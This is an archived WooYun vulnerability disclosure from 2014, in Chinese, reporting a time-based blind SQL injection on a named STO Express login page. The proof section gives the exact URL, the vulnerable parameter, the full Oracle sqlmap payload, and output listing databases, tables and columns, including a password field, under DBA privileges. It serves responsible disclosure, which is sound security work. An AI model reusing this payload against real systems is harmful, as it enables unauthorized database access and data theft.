当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-087673

漏洞标题:申通快递某系统SQL注入漏洞(DBA权限)

相关厂商:申通快递

漏洞作者: 路人甲

提交时间:2014-12-18 14:32

修复时间:2015-02-01 14:34

公开时间:2015-02-01 14:34

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-12-18: 细节已通知厂商并且等待厂商处理中
2014-12-18: 厂商已经确认,细节仅向厂商公开
2014-12-28: 细节向核心白帽子及相关领域专家公开
2015-01-07: 细节向普通白帽子公开
2015-01-17: 细节向实习白帽子公开
2015-02-01: 细节向公众公开

简要描述:

申通快递某系统SQL注入,DBA权限

详细说明:

wooyun以前有个和该系统相关的洞
WooYun: 申通快递运维平台登陆框注入及源码泄漏
POST注入点:
http://bq.sto.cn/Login.aspx
注入参数:txtUsername

1.jpg


漏洞证明:

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: txtUsername (POST)
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: 
__VIEWSTATE=/wEPDwUKLTIxNTQ5Mzc5N2QYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgEFCGJ0
bkxvZ2luOuRt537R02BUqhHXVkPpFql7P+4=&txtUsername=sKwn' AND 
2938=DBMS_PIPE.RECEIVE_MESSAGE(CHR(82)||CHR(78)||CHR(109)||CHR(86),60) AND 
'FOfy'='FOfy&btnLogin.x=1&btnLogin.y=1&txtPass=VZfZ
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Oracle
current user is DBA:    True
available databases [19]:
[*] "CTXSYS\X11"
[*] "EXP\X11"
[*] "TSMS]S"
[*] DBSNMP
[*] DMSYS
[*] EXFSYS
[*] EXP_SYNC
[*] MDSYS
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] SCOTT
[*] STO
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TEST
[*] WMSYS
[*] XDB
STO库中有11个表:
Database: STO
[11 tables]
+------------------------------------------------------------------+
| MLOG$_TAB_营掖\\?CD\\?F8\\?B5\\?E3\\?B1\\?ED                         |
| TAB_\\?B0\\?CD歉\\?C0\\?E0\\?D0\\?CD\\?B1\\?ED                    |
| TAB_\\?B8\\?B6\\?BF\\?EE\\?B7\\?BD式\\?B1\\?ED                     |
| TAB_\\?B9\\?AB司员\\?B9\\?A4\\?B1\\?ED                               |
| TAB_\\?BF\\?EC\\?BC\\?FE\\?C0\\?E0\\?D0\\?CD\\?B1\\?ED           |
| TAB_\\?C1\\?F4\\?B2\\?D6\\?BC\\?FE原\\?D2\\?F2\\?B1\\?ED           |
| TAB_\\?CE\\?CA\\?CC\\?E2\\?BC\\?FE\\?C0\\?E0\\?D0\\?CD           |
| TAB_\\?CE\\?EF品\\?C0\\?E0\\?B1\\?F0\\?B1\\?ED                     |
| TAB_\\?D6\\?D0转\\?B2\\?BF\\?B7\\?A2\\?BC\\?FE路\\?D3\\?C9\\?B1\\?ED |
| TAB_目\\?B5\\?C4\\?B5\\?D8\\?B1\\?ED                              |
| TAB_营掖\\?CD\\?F8\\?B5\\?E3\\?B1\\?ED                               |
+------------------------------------------------------------------+


随便选择一个表:

Table: TAB_\\?CE\\?CA\\?CC\\?E2\\?BC\\?FE\\?C0\\?E0\\?D0\\?CD
[19 columns]
+--------------------------+-------------+
| Column                   | Type        |
+--------------------------+-------------+
| AUTHOR_NUM               | non-numeric |
| AVA_PROFESSOR            | non-numeric |
| C_DIARY_COMMENT_LOG_ID   | non-numeric |
| CANANYONEDISCOVERJID     | non-numeric |
| CARDNUMBER               | non-numeric |
| CT_ID                    | non-numeric |
| DELAY                    | non-numeric |
| HISTORY_ID               | non-numeric |
| ICONID                   | non-numeric |
| IDMEDICOFAMIGLIA         | non-numeric |
| IDSTELLE                 | non-numeric |
| NODE_ID                  | non-numeric |
| P_ASSWORD                | non-numeric |
| SECTION_VALUE            | non-numeric |
| SESSION_MEMBER_LOGIN_KEY | non-numeric |
| SKLEP2                   | non-numeric |
| TIDCLASFISCAIS           | non-numeric |
| TRIGGERTEMPLATEID        | non-numeric |
| VERSION_MIN              | non-numeric |
+--------------------------+-------------+


就不跑其他的库和表了。。。

修复方案:

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2014-12-18 17:26

厂商回复:

谢谢

最新状态:

暂无